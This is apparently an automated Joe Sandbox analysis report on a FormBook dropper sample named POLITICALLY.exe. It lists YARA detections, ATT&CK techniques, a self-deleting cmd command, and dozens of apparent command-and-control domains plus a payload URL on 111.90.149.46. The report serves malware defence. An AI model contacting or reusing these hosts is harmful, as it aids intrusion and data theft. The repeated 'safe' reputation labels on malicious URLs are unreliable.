Source: C:\Users\user\Desktop\POLITICALLY.exe	Process created: C:\Users\user\Desktop\POLITICALLY.exe 'C:\Users\user\Desktop\POLITICALLY.exe'			Jump to behavior
Source: C:\Windows\SysWOW64\control.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\POLITICALLY.exe'			Jump to behavior

Source: explorer.exe, 00000013.00000000.521733147.0000000004F80000.00000004.00000001.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000013.00000002.591577775.00000000008B8000.00000004.00000020.sdmp	Binary or memory string: Progman
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp	Binary or memory string: &Program Manager
Source: explorer.exe, 00000013.00000002.593225214.0000000000EE0000.00000002.00000001.sdmp	Binary or memory string: Progmanlock

Source: C:\Users\user\Desktop\POLITICALLY.exe

Code function: 2_2_0221DC36 cpuid

2_2_0221DC36

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

Yara detected Generic Dropper

Show sources

Source: Yara match	File source: Process Memory Space: POLITICALLY.exe PID: 6976, type: MEMORY
Source: Yara match	File source: Process Memory Space: control.exe PID: 5548, type: MEMORY

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000017.00000002.591241516.00000000004B0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.559281300.000000001DFE0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.545510217.0000000000080000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000017.00000002.592621161.00000000030A0000.00000040.00000001.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Shared Modules1	Path Interception	Process Injection412	Virtualization/Sandbox Evasion21	OS Credential Dumping	Security Software Discovery521	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection412	LSASS Memory	Virtualization/Sandbox Evasion21	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Ingress Tool Transfer1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Deobfuscate/Decode Files or Information1	Security Account Manager	Process Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Obfuscated Files or Information3	NTDS	System Information Discovery211	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol111	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing1	LSA Secrets	Remote System Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
POLITICALLY.exe	17%	Virustotal		Browse
POLITICALLY.exe	17%	ReversingLabs	Win32.Worm.Wbvb

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
23.2.control.exe.4fb518.1.unpack	100%	Avira	TR/Dropper.Gen		Download File
23.2.control.exe.4d37960.4.unpack	100%	Avira	TR/Dropper.Gen		Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.6923599.com/olg8/	0%	Avira URL Cloud	safe
http://www.moopyo.com	0%	Avira URL Cloud	safe
http://www.easiersell.comReferer:	0%	Avira URL Cloud	safe
http://www.artboxxstudio.com/olg8/	0%	Avira URL Cloud	safe
http://www.wiseowldigital.comReferer:	0%	Avira URL Cloud	safe
http://www.easiersell.com/olg8/www.assroyalty.club	0%	Avira URL Cloud	safe
http://www.tuancai.net/olg8/	0%	Avira URL Cloud	safe
http://www.policomercial.com/olg8/	0%	Avira URL Cloud	safe
http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com	0%	Avira URL Cloud	safe
http://www.assroyalty.club	0%	Avira URL Cloud	safe
http://www.6923599.comReferer:	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.assroyalty.club/olg8/www.tuancai.net	0%	Avira URL Cloud	safe
http://www.artboxxstudio.comReferer:	0%	Avira URL Cloud	safe
http://www.nortier.cloud	0%	Avira URL Cloud	safe
http://www.cunerier.comReferer:	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.soakstress.xyz/olg8/www.moopyo.com	0%	Avira URL Cloud	safe
http://111.90.149.46/bin_XNLhDlJvG218.bin	0%	Avira URL Cloud	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.prismatiq.techReferer:	0%	Avira URL Cloud	safe
http://www.soakstress.xyz	0%	Avira URL Cloud	safe
http://www.soakstress.xyz/olg8/	0%	Avira URL Cloud	safe
http://www.onlinewomensclasses.com	0%	Avira URL Cloud	safe
http://www.wiseowldigital.com/olg8/www.cunerier.com	0%	Avira URL Cloud	safe
http://www.morgolf.com	0%	Avira URL Cloud	safe
http://www.onlinewomensclasses.com/olg8/	0%	Avira URL Cloud	safe
http://www.soakstress.xyzReferer:	0%	Avira URL Cloud	safe
http://111.90.149.46/bin_XNLhDlJvG218.binb)	0%	Avira URL Cloud	safe
http://www.6923599.com	0%	Avira URL Cloud	safe
http://www.nortier.cloud/olg8/	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.assroyalty.clubReferer:	0%	Avira URL Cloud	safe
http://www.morgolf.com/olg8/www.easiersell.com	0%	Avira URL Cloud	safe
http://www.tuancai.net	0%	Avira URL Cloud	safe
http://www.6923599.com/olg8/www.wiseowldigital.com	0%	Avira URL Cloud	safe
http://www.purplebean.companyReferer:	0%	Avira URL Cloud	safe
http://www.onlinewomensclasses.com/olg8/www.policomercial.com	0%	Avira URL Cloud	safe
http://www.cunerier.com	0%	Avira URL Cloud	safe
http://www.cunerier.com/olg8/	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.moopyo.com/olg8/	0%	Avira URL Cloud	safe
http://www.auroraleathers.com/olg8/	0%	Avira URL Cloud	safe
http://www.auroraleathers.comReferer:	0%	Avira URL Cloud	safe
http://www.prismatiq.tech/olg8/www.soakstress.xyz	0%	Avira URL Cloud	safe
http://www.tuancai.net/olg8/www.auroraleathers.com	0%	Avira URL Cloud	safe
http://www.morgolf.com/olg8/	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.prismatiq.tech	0%	Avira URL Cloud	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.assroyalty.club/olg8/	0%	Avira URL Cloud	safe
http://www.tuancai.netReferer:	0%	Avira URL Cloud	safe
http://www.easiersell.com/olg8/	0%	Avira URL Cloud	safe
http://www.onlinewomensclasses.comReferer:	0%	Avira URL Cloud	safe
http://www.policomercial.comReferer:	0%	Avira URL Cloud	safe
http://www.wiseowldigital.com/olg8/	0%	Avira URL Cloud	safe
http://www.nortier.cloudReferer:	0%	Avira URL Cloud	safe
http://www.auroraleathers.com/olg8/www.artboxxstudio.com	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.easiersell.com	0%	Avira URL Cloud	safe
http://www.moopyo.comReferer:	0%	Avira URL Cloud	safe
http://111.90.149.46/bin_XNLhDlJvG218.bin3	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.auroraleathers.com	0%	Avira URL Cloud	safe
http://111.90.149.46/bin_XNLhDlJvG218.bin/	0%	Avira URL Cloud	safe
http://111.90.149.46/bin_XNLhDlJvG218.binw	0%	Avira URL Cloud	safe
http://111.90.149.46/in_XNLhDlJvG218.bin	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://111.90.149.46/bin_XNLhDlJvG218.bin	true	Avira URL Cloud: safe	unknown
www.nortier.cloud/olg8/	true	Avira URL Cloud: safe	low

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.6923599.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.moopyo.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.easiersell.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.artboxxstudio.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiseowldigital.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.easiersell.com/olg8/www.assroyalty.club	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuancai.net/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.policomercial.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.artboxxstudio.com/olg8/www.onlinewomensclasses.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.assroyalty.club	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.6923599.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.assroyalty.club/olg8/www.tuancai.net	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.artboxxstudio.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nortier.cloud	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cunerier.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.soakstress.xyz/olg8/www.moopyo.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.urwpp.deDPlease	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.prismatiq.techReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soakstress.xyz	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soakstress.xyz/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000013.00000000.507594698.000000000095C000.00000004.00000020.sdmp	false		high
http://www.onlinewomensclasses.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiseowldigital.com/olg8/www.cunerier.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.morgolf.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.onlinewomensclasses.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.soakstress.xyzReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.149.46/bin_XNLhDlJvG218.binb)	POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.6923599.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nortier.cloud/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.coml	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.assroyalty.clubReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.morgolf.com/olg8/www.easiersell.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuancai.net	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/frere-jones.html	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.6923599.com/olg8/www.wiseowldigital.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.purplebean.companyReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.onlinewomensclasses.com/olg8/www.policomercial.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cunerier.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designersG	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.cunerier.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.moopyo.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.auroraleathers.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.auroraleathers.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prismatiq.tech/olg8/www.soakstress.xyz	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuancai.net/olg8/www.auroraleathers.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.morgolf.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.prismatiq.tech	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.typography.netD	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.assroyalty.club/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tuancai.netReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.easiersell.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.onlinewomensclasses.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.policomercial.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiseowldigital.com/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.nortier.cloudReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.auroraleathers.com/olg8/www.artboxxstudio.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fonts.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.easiersell.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.moopyo.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.149.46/bin_XNLhDlJvG218.bin3	POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sakkal.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.auroraleathers.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.149.46/bin_XNLhDlJvG218.bin/	POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://111.90.149.46/bin_XNLhDlJvG218.binw	POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://111.90.149.46/in_XNLhDlJvG218.bin	POLITICALLY.exe, 0000000A.00000002.547813821.00000000008B9000.00000004.00000020.sdmp	false	Avira URL Cloud: safe	unknown
http://www.purplebean.company/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.wiseowldigital.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.morgolf.comReferer:	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.artboxxstudio.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.policomercial.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.policomercial.com/olg8/www.6923599.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.purplebean.company	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.jiyu-kobo.co.jp/	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.purplebean.company/olg8/www.nortier.cloud	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	explorer.exe, 00000013.00000000.530948897.000000000B1A6000.00000002.00000001.sdmp	false		high
http://www.moopyo.com/olg8/www.morgolf.com	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.prismatiq.tech/olg8/	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cunerier.com/olg8/www.purplebean.company	explorer.exe, 00000013.00000002.607074490.00000000062E0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	Flag	ASN	ASN Name	Malicious
111.90.149.46	unknown	Malaysia		45839	SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	true

General Information

Joe Sandbox Version:	32.0.0 Black Diamond
Analysis ID:	411376
Start date:	11.05.2021
Start time:	20:41:30
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 9m 36s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	POLITICALLY.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	27
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.rans.troj.spyw.evad.winEXE@7/0@0/1
EGA Information:	Failed
HDC Information:	Successful, ratio: 32.9% (good quality ratio 28.7%) Quality average: 71% Quality standard deviation: 33.3%
HCA Information:	Successful, ratio: 57% Number of executed functions: 135 Number of non-executed functions: 59
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .exe
Warnings:	Show All Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

No simulations

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
111.90.149.46	attached template.exe	Get hash	malicious	Browse	111.90.149.46/chris_fctvQ149.bin

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY	attached template.exe	Get hash	malicious	Browse	111.90.149.46
	0F1D9F17D6380C6318F136F9F951922CFFD80BA90FA87.exe	Get hash	malicious	Browse	101.99.84.46
	2f50000.exe	Get hash	malicious	Browse	124.217.246.96
	d801e424_by_Libranalysis.docx	Get hash	malicious	Browse	101.99.95.105
	SecuriteInfo.com.ArtemisB23AF6C6F1A9.18153.exe	Get hash	malicious	Browse	101.99.91.200
	t0lYf7AR1S.exe	Get hash	malicious	Browse	101.99.91.200
	SecuriteInfo.com.Trojan.Siggen12.47248.30665.exe	Get hash	malicious	Browse	101.99.90.200
	SecuriteInfo.com.Trojan.Siggen12.47248.964.exe	Get hash	malicious	Browse	101.99.90.200
	SecuriteInfo.com.Trojan.Siggen12.47248.16606.exe	Get hash	malicious	Browse	101.99.90.200
	SecuriteInfo.com.Trojan.Siggen12.47234.30189.exe	Get hash	malicious	Browse	101.99.90.200
	SecuriteInfo.com.Trojan.Siggen12.47248.1366.exe	Get hash	malicious	Browse	101.99.90.200
	co#U00cc pia de pagamento.xlsx	Get hash	malicious	Browse	111.90.146.131
	OUOTATION.doc	Get hash	malicious	Browse	101.99.91.20
	JQQyuX3xg6.exe	Get hash	malicious	Browse	111.90.150.162
	m2xzKhblzC.exe	Get hash	malicious	Browse	111.90.150.162
	q1JP6yNjf3.exe	Get hash	malicious	Browse	111.90.150.37
	seed.exe	Get hash	malicious	Browse	101.99.90.200
	SecuriteInfo.com.BehavesLike.Win32.Virut.rc.exe	Get hash	malicious	Browse	111.90.146.182
	PO-3170012466.exe	Get hash	malicious	Browse	101.99.90.137
	0238-35-pdf.scr.exe	Get hash	malicious	Browse	101.99.70.172

JA3 Fingerprints

No context

Dropped Files

No context

